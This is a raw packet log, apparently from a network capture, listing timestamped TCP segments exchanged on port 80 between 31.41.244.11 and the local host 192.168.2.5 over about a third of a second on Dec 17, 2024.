Dec 17, 2024 06:03:19.718250990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.718291998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.718362093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.718401909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.719355106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.719394922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.719475031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.719516993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.720470905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.720513105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.720590115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.720630884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.721579075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.721620083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.721688986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.721729994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.722702026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.722745895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.722805977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.722845078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.723787069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.723826885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.723912954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.723953962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.724910975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.724951982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.725064993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.725100040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.726022005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.726077080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.726141930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.726181030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.727204084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.727247953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.727329969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.727374077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.728257895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.728296995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.728369951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.728411913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.729374886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.729417086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.729496956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.729537010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.730474949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.730515957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.730595112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.730633974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.731595993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.731654882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.731688023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.731730938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.732705116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.732795954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.732846022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.733813047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.733930111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.733958960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.733983994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.734927893 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.734970093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.735054016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.735094070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.736058950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.736112118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.736181021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.736227989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.737154007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.737204075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.737337112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.737382889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.738274097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.738382101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.738434076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.739392042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.739521980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.739574909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.740549088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.740569115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.740609884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.740633965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.741627932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.741751909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.741806984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.742733002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.742842913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.742893934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.743865013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.743921995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.743989944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.744963884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.745022058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.745080948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.745822906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.746062040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.746192932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.746243000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.747201920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.747379065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.747436047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.748322964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.748363018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.748420954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.749439001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.749476910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.749550104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.749927998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.750528097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.750649929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.750689983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.751640081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.751768112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.751808882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.752763987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.752800941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.752873898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.753818035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.753880978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.753915071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.753983974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.755040884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.755084038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.755094051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.756407022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.756464958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.890144110 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.890645981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.890708923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.890810966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.890824080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.890857935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.891614914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.891655922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.891747952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.892467022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.892508030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.892581940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.893615961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.893655062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.893918991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.894769907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.894818068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.894942045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.894987106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.895912886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.896053076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.896097898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.896995068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.897108078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.897154093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.898134947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.898286104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.898327112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.899285078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.899332047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.899419069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.901335001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.901381016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.901392937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.901405096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.901448965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.901453972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.901494026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.902559042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.902606964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.902673960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.902714014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.903634071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.903695107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.903764009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.903808117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.904767036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.904812098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.904830933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.904872894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.905878067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.905921936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.906008959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.906071901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.906956911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.907016993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.907080889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.907121897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.908117056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.908159971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.908241034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.908284903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.909203053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.909246922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.909323931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.909365892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.910327911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.910370111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.910402060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.911529064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.911541939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.911571026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.911601067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.912610054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.912739992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.912784100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.913635015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.913816929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.913822889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.914782047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.914824963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.914921999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.915916920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.915961027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.916034937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.916076899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.916999102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.917146921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.917190075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.918142080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.918489933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.918536901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.919229031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.919275999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.919307947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.920344114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.920387983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.920465946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.921648026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.921659946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.921699047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.922780037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.922892094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.922938108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.923778057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.923836946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.923851013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.924845934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.924897909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.924978971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.925915956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.925967932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.926033020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.926080942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.927037001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.927165985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.927217007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.928181887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.928288937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.928339958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.929301977 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.929337978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.929349899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.929380894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.930382967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.930517912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.930567980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.931484938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.931619883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.931670904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.932610035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.932662010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.932723045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.933779001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.933841944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.933916092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.934931040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.934989929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.935054064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.935102940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.936003923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.936168909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.936218977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.937130928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.937273026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.937319040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.938216925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.938369989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.938419104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.939333916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.939382076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.939402103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.940428972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.940479040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.940541029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.941533089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.941582918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.941659927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.942394972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.942646027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.942867041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.942914009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.943758965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.943892002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.943939924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.944888115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.944933891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.945015907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.945813894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.946014881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.946060896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.946129084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.946173906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.947130919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.947176933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.947288990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.947333097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:19.948184967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:19.948230028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.082417011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.082477093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.082495928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.082540989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.082619905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.082672119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.082748890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.082789898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.083538055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.083591938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.083615065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.083627939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.085591078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.085625887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.085652113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.085664988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.085726976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.085829020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.085846901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.085891962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.086855888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.086930990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.086976051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.087023973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.089575052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090529919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090581894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090594053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.090615034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090670109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090693951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.090703964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.090708971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.090717077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.090748072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.091545105 CET	80	49850	31.41.244.11	192.168.2.5
